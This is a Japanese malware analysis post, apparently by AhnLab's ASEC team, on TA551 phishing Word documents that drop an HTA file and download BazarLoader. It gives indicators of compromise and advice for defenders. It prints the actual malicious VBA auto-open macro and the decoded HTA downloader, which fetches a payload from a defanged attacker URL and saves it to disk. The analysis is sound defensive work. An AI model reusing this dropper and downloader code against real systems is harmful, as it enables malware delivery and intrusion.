ASEC 分析チームでは、TA551 グループが攻撃に使用した DOC マクロドキュメントについて、情報の公開を続けている。7月に公開した内容とマクロ付きドキュメントの動作方式に変化はないものの、今回はマクロの実行後、最終段階において BazarLoader を拡散させるケースが確認された。
https://asec.ahnlab.com/jp/25113/
はじめに、当社が5月に発行した BazarLoader 分析レポートの一部内容を引用すると、以下の通りである。
ATIP – BazarLoader 解析レポート「概要」一部抜粋
BazarLoader はメモリ上でバックドアをダウンロードし、正常なプロセスにインジェクションするマルウェアであり、C++ 言語をベースに作られ、主に x64 実行ファイル形式で拡散している。BazarLoader がダウンロードするマルウェアは「BazarBackdoor」と呼ばれ、このバックドアはユーザーの PC 情報および企業環境の情報を収集し、企業の場合は他のマルウェアをダウンロードするダウンローダー機能を実行する。海外の感染事例では「CobaltStrike」をインストールし、ラテラルムーブメント(Lateral Movement)および追加の情報を収集しており、最終的に「Ryuk Ransomware」や「Conti Ransomware」をインストールし、当該企業に金銭を要求している。BazarLoader と BazarBackdoor は、*.bazar という C2 ドメインを使用しているため「Bazar」という名前が付けられた。
今回拡散したフィッシングメールは以下のように特別な内容を含んではいないが、今回も DOC ファイルを暗号化圧縮して添付していることがわかる。
8月末から拡散し始めた DOC ファイル名は以下の表の通りである。ファイル名を確認したところ、現在までの配布動向と同じように「[特定の単語].[日付].doc」の形式でハイフン(-)とカンマ(,)を混用し、多数のファイルを配布している。また、前回の拡散とは異なり DOC ファイルのマクロを実行後にドロップされる HTA ファイルは 1.hta であり、すべて同じであることがわかる。
今回は、Word ファイルでマクロが有効化されるとドロップされる HTA ファイルにおいても若干の変形が確認された。Word ファイルの動作方式は以前と同じである。Word ファイルを実行したときに確認されるマクロの有効化を誘導する内容の画像も同じであり、特別な内容ではないものと思われるが、マクロが有効化されると画像の後ろに隠されたテキストに基づいて HTA ファイルが生成される方式である。
マクロコードを確認すると、以下のように Word 本文の内容をベースに C:\ProgramData\1.hta にドロップすることがわかる。すなわち、本文で繰り返し確認される rki9 を削除して HTA ファイルを生成するものと確認できる。添付した二つ目のコード内容は、そのようにして生成された「1.hta」ファイルの一部内容を追加で復号するロジックに基づいて示したものである。HTA ファイルが実行されると外部 URL からダウンローダーで動作する追加のマルウェアをダウンロードし、このファイルはコードの末尾部分で確認される devDivEx.jpg となる。
Sub document_open()
init "c:\programdata\1.hta", Replace(ActiveDocument.Content, "rki9", "")
End Subvar devDriveDoc = new ActiveXObject('msxml2.xmlhttp');
devDriveDoc.open('GET', 'hxxp://brookscargos[.]com/bmdff/kEMjHpH/npksoRQONwZUsnmvGS2Nl0DvMefQPvsyQ/QECxpCU6vz7EPQJgBj/yixySDbVkH6K5ihCTO9BY3Jj2n/iDiNtaKeMOKMXULwdjN3gnitjUdm6i3OQlLqgqOiz/1tvjGdIcS/iIx9AM3zw9hq6rW3/73053/galax9?q=RuId5tt5BDbkCLPzTeSR&ref=Pt3zxKAEB8&id=PCCEA', false);
devDriveDoc.send();
if (devDriveDoc.status == 200) {
try {
var docExDir = new ActiveXObject('adodb.stream');
docExDir.open;
docExDir.type = 1;
docExDir.write(devDriveDoc.responsebody);
docExDir.savetofile('c:\\users\\public\\devDivEx.jpg', 2);
docExDir.close;
} catch (e) {
}
}ここで jpg 拡張子でダウンロードされるファイルが、BazarLoader DLL であると確認された。現在は BazarLoader が追加でダウンロードされることがあるマルウェアのネットワークが無効化されている関係で再現は困難だが、当社インフラによって Trickbot をロードして動作していたことが判明している。
ユーザーは、出どころが不明なメールの添付ファイルを開かないようにしなければならず、もし添付ファイルをダウンロードしてしまった場合は、マクロの実行(有効化)を避けなければならない。ドキュメントプログラムのセキュリティ設定が低い場合、セキュリティの警告がなく直接マクロが実行されるため、ユーザーはセキュリティ設定を高レベルに保ち、意図しない機能が実行されないよう注意が必要である。
また、使用しているアンチウイルスソフトのエンジンパターンのバージョンを最新版にアップデートして使用することを推奨する。
AhnLab V3 プロダクトラインでは、本記事で紹介したタイプの不正なファイル(DOC、HTA、DLL 等)について、以下の通り検知している。
[ファイル検知]
Downloader/DOC.TA551
Downloader/DOC.TA551.S*
Downloader/MSOffice.Agent
Downloader/HTA.TA551
Trojan/Win.BazarLoader.R440111
Trojan/Win.CryptLoader.R440284
[IOC]
409491f78930a4f26581ebd9a6ecaa2e
bc8073f5646ad6a1bc1be76e556250eb
7ccb728af8c2ce3b5202ce94eaffc770
hxxp://beltmorgand[.]com
hxxp://entiredelivery2014b[.]com
hxxp://povertymanagement2018b[.]com
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報